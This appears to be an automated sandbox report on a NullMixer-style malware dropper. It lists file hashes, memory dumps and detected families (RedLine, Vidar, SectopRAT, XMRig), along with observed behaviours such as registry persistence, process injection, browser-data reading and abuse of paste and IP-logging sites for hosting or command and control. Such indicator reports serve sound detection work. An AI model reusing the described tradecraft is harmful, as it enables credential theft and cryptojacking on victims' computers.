| SHA1 | 5fc33906263bbb3cbf306e69b9c5ef2260ace7e5 |
| SHA256 | 69e562f8d0968dd248d2d9dc5de0cc42495e06f8b8563b10425bd8064033be1f |
| SHA512 | 958752f053887bd2f9fbd03cd345585deded65228d093499a3d4e94071b0d9073b0ba7924c2d83bb0fe4f7f4d2274a53416fabfcc0bf45892d23eb29d4162131 |
memory/1912-131-0x0000000000A70000-0x0000000000BB2000-memory.dmp
memory/1784-130-0x0000000000840000-0x000000000092E000-memory.dmp
\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
| MD5 | ef5fa848e94c287b76178579cf9b4ad0 |
| SHA1 | 560215a7c4c3f1095f0a9fb24e2df52d50de0237 |
| SHA256 | 949eec48613bd1ce5dd05631602e1e1571fa9d6b0034ab1bffe313e923aff29c |
| SHA512 | 7d4184aa762f3db66cf36955f20374bf55f4c5dbe60130deaeade392296a4124867c141f1d5e7fbf60b640ef09cce8fb04b76b7dd20cbac2ce4033f9882a1071 |
C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\6f1aa71747b4a291.exe
| MD5 | 2b32e3fb6d4deb5e9f825f9c9f0c75a6 |
| SHA1 | 2049fdbbe5b72ff06a7746b57582c9faa6186146 |
| SHA256 | 8bd8f7a32de3d979cae2f487ad2cc5a495afa1bfb1c740e337c47d1e2196e1f2 |
| SHA512 | ad811d1882aa33cce0ebbab82e3f2db7596f88392cd9c142aef0b0caa4004afcf0253f25e7a8f228778dd3a2ec43d2028985a3e85807438c5bed3ae4709f9cfa |
C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\24ebc9ce784c63.exe
| MD5 | 5866ab1fae31526ed81bfbdf95220190 |
| SHA1 | 75a5e08b3b9ad2dff35dfbbb3ffe8d983c2be25f |
| SHA256 | 9e1a149370efe9814bf2cbd87acfcfa410d1769efd86a9722da4373d6716d22e |
| SHA512 | 8d99ab09e84e4ef309da34be94946cbfcffeb1c0ca49e2452deb738d801e551062ebb134f1b99a9baf03003a8e720d525521ce09aeac341d3cba3fcfbc618fb5 |
C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\e4f0738cc5646a38.exe
| MD5 | 7e06ee9bf79e2861433d6d2b8ff4694d |
| SHA1 | 28de30147de38f968958e91770e69ceb33e35eb5 |
| SHA256 | e254914f5f7feb6bf10041e2c705d469bc2b292d709dc944381db5911beb1d9f |
| SHA512 | 225cd5e37dbc29aad1d242582748457112b0adb626541a6876c2c6a0e6a27d986791654fd94458e557c628dc16db17f22db037853fae7c41dde34ba4e7245081 |
\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\3d1f9c2a6.exe
| MD5 | 079d742f6fc3fcc2eca352a1537e5103 |
| SHA1 | d904d7432a367ad078c99c281b67705e7332496a |
| SHA256 | 4e3b1d612eac7d9177e63042118ef6171a4cb074abcd2dd34704a96a47e27f39 |
| SHA512 | 4e27380efcf33a467f2b9fe14b147d0290488bb55d7f637654b6c8c52b50a7046828c8b3fc10049e6b0b5e0f8557aa4a5209981218f1b0008eb266d62483a27b |
\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\c0f099be1ace2.exe
| MD5 | 13a289feeb15827860a55bbc5e5d498f |
| SHA1 | e1f0a544fcc5b3bc0ab6a788343185ad1ad077ad |
| SHA256 | c5483b2acbb352dc5c9a811d9616c4519f0e07c13905552be5ec869613ada775 |
| SHA512 | 00c225fb1d88920c5df7bb853d32213a91254fb8c57169c58c8b0ffab4501486e24d87e3d8f5665b16e366362cb81deec535d833ed42434fdc31f0400ee7ffa7 |
\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\d55cc0d45c3a05.exe
| MD5 | 0965da18bfbf19bafb1c414882e19081 |
| SHA1 | e4556bac206f74d3a3d3f637e594507c30707240 |
| SHA256 | 1cdddf182f161ab789edfcc68a0706d0b8412a9ba67a3f918fe60fab270eabff |
| SHA512 | fe4702a2fde36b4fb0015ad7d3e2169a1ccbf5e29d7edef40f104ed47661b4b0365b13b1913e9f4e0ab7bc9ac542ee86c02a802a13567dfd0b8f5485a5be829b |
C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\caa4baaf544.exe
| MD5 | 3f9f7dfccefb41726d6b99e434155467 |
| SHA1 | f5a7b26fb2aa6ebb7177b30b24a7fdbc067de8f1 |
| SHA256 | 37342babfd23ab30837a55886012a5125c69d2e5f883dadfc06a42cfb28e5b34 |
| SHA512 | e0ac41a8c91e8521c8ce46444299c892335af5bfce7683abb915d8ede4f7638e9e76bbd9474fffa3f12cbc11725790b4be82d856aadd55027e8186bc1b6c1762 |
memory/660-140-0x0000000000950000-0x000000000097C000-memory.dmp
memory/2420-139-0x0000000000D00000-0x0000000000D08000-memory.dmp
C:\Windows\winnetdriv.exe
| MD5 | 01ad10e59fa396af2d5443c5a14c1b21 |
| SHA1 | f209a4f0bb2a96e3ee6a55689e7f00e79c04f722 |
| SHA256 | bef1cffaba8186ce62265e0b322ca9fd9326a8929591df569a4953456c752137 |
| SHA512 | 1e067ade999ff933a644fde66c6ab9abb8a960ce1c8064368adcde4c09d924bd22d1b43c68b7c968e982fc75937969a2876e9e2a024f72e693f9ba397d449e02 |
memory/1744-153-0x0000000000270000-0x0000000000354000-memory.dmp
memory/3036-142-0x0000000002370000-0x0000000002454000-memory.dmp
memory/2692-138-0x000000013FC70000-0x000000013FC80000-memory.dmp
memory/660-159-0x0000000000140000-0x0000000000146000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
memory/2704-42-0x000000006B440000-0x000000006B4CF000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
memory/2704-39-0x000000006B280000-0x000000006B2A6000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
memory/660-160-0x0000000000150000-0x0000000000170000-memory.dmp
memory/660-161-0x0000000000170000-0x0000000000176000-memory.dmp
memory/1912-162-0x0000000000270000-0x0000000000282000-memory.dmp
memory/2704-171-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2704-170-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2704-169-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2704-167-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/2704-164-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2704-163-0x0000000000400000-0x0000000000A07000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\CabBE81.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\TarBEA3.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
memory/564-225-0x0000000000400000-0x00000000032F3000-memory.dmp
memory/2496-226-0x0000000000400000-0x0000000003346000-memory.dmp
memory/2692-229-0x00000000006C0000-0x00000000006CE000-memory.dmp
C:\Users\Admin\AppData\Roaming\services64.exe
| MD5 | ad0aca1934f02768fd5fedaf4d9762a3 |
| SHA1 | 0e5b8372015d81200c4eff22823e854d0030f305 |
| SHA256 | dc10f50f9761f6fbafe665e75a331b2048a285b1857ad95e0611ace825cba388 |
| SHA512 | 2fba342010ba85440784190245f74ea9e7c70974df12c241ccb6b72a6e1006a72bd1fa2e657f434d7479758f9508edb315398f6e95d167a78b788cea732be3b7 |
memory/1716-233-0x000000013FDA0000-0x000000013FDB0000-memory.dmp
memory/1912-234-0x00000000087E0000-0x000000000886C000-memory.dmp
memory/1912-235-0x00000000007A0000-0x00000000007BE000-memory.dmp
memory/1360-245-0x0000000000400000-0x000000000041E000-memory.dmp
memory/1360-244-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/1360-242-0x0000000000400000-0x000000000041E000-memory.dmp
memory/1360-240-0x0000000000400000-0x000000000041E000-memory.dmp
memory/1360-238-0x0000000000400000-0x000000000041E000-memory.dmp
memory/1360-236-0x0000000000400000-0x000000000041E000-memory.dmp
memory/1360-246-0x0000000000400000-0x000000000041E000-memory.dmp
memory/1360-250-0x0000000000400000-0x000000000041E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS5FFB.tmp\Install.cmd
| MD5 | a3c236c7c80bbcad8a4efe06a5253731 |
| SHA1 | f48877ba24a1c5c5e070ca5ecb4f1fb4db363c07 |
| SHA256 | 9a9e87561a30b24ad4ad95c763ec931a7cfcc0f4a5c23d12336807a61b089d7d |
| SHA512 | dc73af4694b0d8390bcae0e9fd673b982d2c39f20ca4382fddc6475a70891ce9d8e86c2501d149e308c18cd4d3a335cc3411157de23acf6557ed21578c5f49cc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DJB1KT77\favicon[1].png
| MD5 | 18c023bc439b446f91bf942270882422 |
| SHA1 | 768d59e3085976dba252232a65a4af562675f782 |
| SHA256 | e0e71acef1efbfab69a1a60cd8fadded948d0e47a0a27c59a0be7033f6a84482 |
| SHA512 | a95ad7b48596bc0af23d05d1e58681e5d65e707247f96c5bc088880f4525312a1834a89615a0e33aea6b066793088a193ec29b5c96ea216f531c443487ae0735 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 799f3adcfbb6596256a7c7b1e0237480 |
| SHA1 | f570b98814687d730a409db056ec9afea9206758 |
| SHA256 | 616a0cc53aa7ae199ac985d8cc545dba2d9ba15bd27c9baa32bb3c9876b875a0 |
| SHA512 | 6a46f3b31ee1a37d7458432ee2d3fd630df7bd29f248bed38cb631b545e68b85742e587580902bc5daf2604d649c86a4d318500246361f48ed58a58f8443fad1 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | d2f3d7662156d79d501168854ba7abe6 |
| SHA1 | 19671aabbbcc1ea2c1aec6c26cdab1d3e1e1a868 |
| SHA256 | 4deb9de2a86ca348e461ef94c1687cd3a58ee78fac78d9c297affd64c4e17333 |
| SHA512 | 8e7a61d1e5208ed1809143a19d2b0f4affa20b80117a09f195fcca2d903979041cb30212932fe80561c31d8ec8ee5d8aa177d2e69504e5a16418dae3f35f03b0 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 740af178c8807886f77382c6a0bcb167 |
| SHA1 | 73b7d12c8f29b1e7d0ce420249039320fbedfe9f |
| SHA256 | 9bf11adf85c9a09c1d2aa3df19f0ee8bd3938b5d35cefdf5c436355d0ff9e39e |
| SHA512 | 882e6a4f75c021d66f5150f029b29eba2a5c6874f1091f1d8195095fdfb4387a11b9886c4212a1c48c25b1fa2139032ac39969d9d21222f5913e9030b3aa32bb |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | ce75ec67429098a8e34149a6b07f666c |
| SHA1 | 36029e0c1dad47814a923ca1906a57e983e33204 |
| SHA256 | 70d7ab9afc1d778e828a956c644c0f0cb2a6aec3688b7038451678444e9d5c46 |
| SHA512 | 58548a0bb7a4306a3653cade59d50c10e7d21346973e5e52457e7476ee40b57a4b1ab06666ad35df623b827af07ed66bb44d72d748709b28613ec063add8fafa |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | ab7e75accdb0dddb4378e3ffef914713 |
| SHA1 | 47934a23a6f5acac29155bfc5e0053c7ed964e68 |
| SHA256 | b13048a1140a44affb2f6f1652cccdba752417186f202528fee504f3d4284018 |
| SHA512 | 5f1a778a0487ed88e69e97390b4f7e1404f9888e7f3501337ba33b08b5e2eb7154bd93a7bad31a02238df8eaf817b284cd852c79d39d1cc302f1fe7faf09b111 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 940ec3c43a409e9e8cb7707bb397bc63 |
| SHA1 | 1711a242d8edd46a59b922ddbd2818d64567350d |
| SHA256 | c9affb6d76681684f4e05f1e60392a5ded5fd75e0e7560c6c4eb9163f93e712a |
| SHA512 | 79057d32b31d73ea17c013f127941cc13f7161d0aca873722569cd8e56f9998821f06d520f7f54a3d54750c58b2959be42c31a2ffdce40f14b3268e676d7a24d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC
| MD5 | bf2b8babd1517ca2f37d53866fa8eb64 |
| SHA1 | 9f75708a8fac7789df3f18b27c0f99c039998eeb |
| SHA256 | 70d5b6161a5916f7b7fdfe5ffcff16cc69052acb58f12ac1607233e1a603372d |
| SHA512 | 1df4f9929c5979ac3a30545af04d948d57a497e90a41ed5a6df9d9f2636084d84dcc6fe7a01bd15d909e9a395b320dc3ccedea9ddfeac390744c167d88616e3a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC
| MD5 | e4a68ac854ac5242460afd72481b2a44 |
| SHA1 | df3c24f9bfd666761b268073fe06d1cc8d4f82a4 |
| SHA256 | cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f |
| SHA512 | 5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c53f7d51a540b5cc7a64887cfc37b653 |
| SHA1 | 471c41bf9d3df27ecf94ceabf2cb1dd261ba864f |
| SHA256 | 0f4aeba46469f81e5602c6aecd1f6bba9310cfdeba104347870efeea2dc22968 |
| SHA512 | a13a39d544ab355ca4b1d98d50f158c4c690bbbe558c1fde0a2d0974acaef0a70a196e66f495b032807a66c388f8bdae4e339c4fa41794fb5cb4565d9a525098 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 81af0655573bae6402ad1202df2d4d15 |
| SHA1 | bbbf6ed4a18581a3cbf86e9f0324f85eb7c66c7d |
| SHA256 | ba12cfe2d6c7749f881e571be5425aa6faf45531bcb40bd6b1be6abb435fccf2 |
| SHA512 | 74698be3a88a79d54e41502c59721e308fc5bea5d3a79dd2eba9b76c233a5fc4a5cdbebedc56453f2c04b94b8ff8f2c73d0c765e28e17d40cb50ad1edae7af6a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | ecdf5a0a8b9a0d21535d862bf8fa28c9 |
| SHA1 | e5fa1d176fe45064abefc4460c009944bc96b923 |
| SHA256 | d97bfd8a447c7767a04cf6d124acc891357e3d8e5cd474c789d4d585290fb7d9 |
| SHA512 | 4d729d32d904e3762bad0100b7124ffc04c4fb9d8dd0e70403a92aa9c8a50ce80df1de8cabef12c381d2dfbe14230fe1eb4d2c52b58132182ddb799b4edc1e1b |
memory/2336-770-0x000000013F930000-0x000000013F936000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | ca60fb44436f4df836f36295ec6b0beb |
| SHA1 | 016ec87aeb336b40fa89ad7018bf41e55f2b7820 |
| SHA256 | 18e053ef80d03961959dea5c77b3c9271f50ab36f89950e5361230844b226240 |
| SHA512 | dd774a2197b3c3fc82a894625478c69858102a90ce5f9a6b8db7a1b94b57598726e6416257854bbdc8e6542ea9d75d333323339e1fbfcc891f523c20efadfd80 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 89489a173dd5d2d0764e0512fe893dd5 |
| SHA1 | 37ddd9ae26022a9f1efd2191d2e56be99eb95d22 |
| SHA256 | b1d2c97f15fceb8cbfcdb8941fb581c70b8d2de4a9e18c0d6e21ad6c35312490 |
| SHA512 | 7545ab9f550730f9bc4b26beb351e0b536cf0f89f909b746ff3e0261c31a24ba195af44b165fb5ba53ad79e12f2050f186eb8a430e882a8c57ee9048cb6cc46f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c9fc01202c7060350a8e5f2b0fdb2013 |
| SHA1 | cd1e0160177ca3aabf9c0d1be662ce8127747e3f |
| SHA256 | 417a6d935979067a4e420e34794dab74607bbdfa51d18fd588af16111d452c90 |
| SHA512 | fe84238656104d70b1d07bd7f9ad7bc0c59a07977c85642c6b0b6d6e09685c6f66e3b8c100c34073ee69cbe11be05500d6544c1d9780568b4cae5ca6e5682b2d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 81cda058bc34d4a3150bd4016e51cea0 |
| SHA1 | f12bd32b289d88c5653aeca766a10c2bfcd2933d |
| SHA256 | c51be7437622bcc0b39a7777b81436536dc84893395ec58d9df5d82b98bfd102 |
| SHA512 | 96c1fae38c77b92807a8e5f4b4756758d1d48a9e983bbe9740a31bbf7859e4ffdbbd55f789d93eba9510bfa067ea6673943f58495e37f6ea6517f0b269d122b0 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2e51e35d8d30ad12bf15259e5b38e895 |
| SHA1 | 25e1a6406f507e4133a29b64a0fa1f6e0dedb920 |
| SHA256 | 6d6478f9d9766ecaebd1c5f98d03bda0cb9e92c6d8ecd96fc3cb1f26b2c57c58 |
| SHA512 | 6dbfc9b2b93b34d028ec2b3a586874ca92d91c339e279db721eeba522a57e3f52db0205b3b2d8caeea980eab79bdff870cc7a9dc753f185de3649dbc860af51e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | bf6bd5253aef62752da181dc76f1ecca |
| SHA1 | 4e99aa95728b4cd95e5f60429354a820d5e00a68 |
| SHA256 | 2a705696f830323c2b3f3c3850f22007a1efbc4cfbf06d317f389a67cc3240a0 |
| SHA512 | b1ef3981889f8d48d1770de13e1539280b5dc045098393444604515cfd8d92f9052b932985cb82b96bfb0c464fbdc1cff3816b04058495a83bdb9c79562a2997 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | f32e3a5899bd1fb40609f2eb02d4f210 |
| SHA1 | 87db7c11afb7397ff90b4b55f7782c49c62afe3a |
| SHA256 | 99a05549611ea85b6fcc6ec0cb8c9b830a637af8a72d171f3cd44918b0b84901 |
| SHA512 | 6af21bce6ecad712a33880a708934f8a7e641ed985737261da485ccff9a518fdc4c666e95dfd2648bc6aefe4627b0d69198eb980cfcce4e2c9d4d872a9bc2e3a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 12b062be1b3533eb2dc1870127f05673 |
| SHA1 | 5f6adb5b81db69628d155c965ffee5f02a4f7711 |
| SHA256 | 0a7d7ca5fb5c829406e424041714b9f27020ffc9df551bb3107e79f343c1f8d5 |
| SHA512 | 22522141c9f7ce2334915fd039d26594c5c68abd3a0f467397f41dba37588abcce7deff32113e2af284e337bb6fad5cc6d777bd05217af188cb77a11146c7413 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 337ec9f9e5b12c3cb6eff22708c4d311 |
| SHA1 | 3f360caf2ea1b8f8b1d5894c58fd1f959e00857c |
| SHA256 | 15d34e62f7111345e95cfc965eaa0945eb97dec4e09c67c77de6820cf91add9e |
| SHA512 | 4b62e056f15070b7b573c572ca4e6e4cdbc3e937846f8e3f070a7b34e50a8c06c8089cde17de0490a245e04bd7c8496d4e44eaa94844bfe2d520474ac736e330 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-12-06 12:12
Reported
2024-12-06 12:15
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
150s
Command Line
Signatures
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Sectoprat family
Vidar
Vidar family
Xmrig family
xmrig
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS4591E257\c0f099be1ace2.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\chrome2.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\services64.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\7zS4591E257\e4f0738cc5646a38.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.db-ip.com | N/A | N/A |
| N/A | api.db-ip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4948 set thread context of 2040 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe |
| PID 3936 set thread context of 5796 | N/A | C:\Users\Admin\AppData\Roaming\services64.exe | C:\Windows\explorer.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
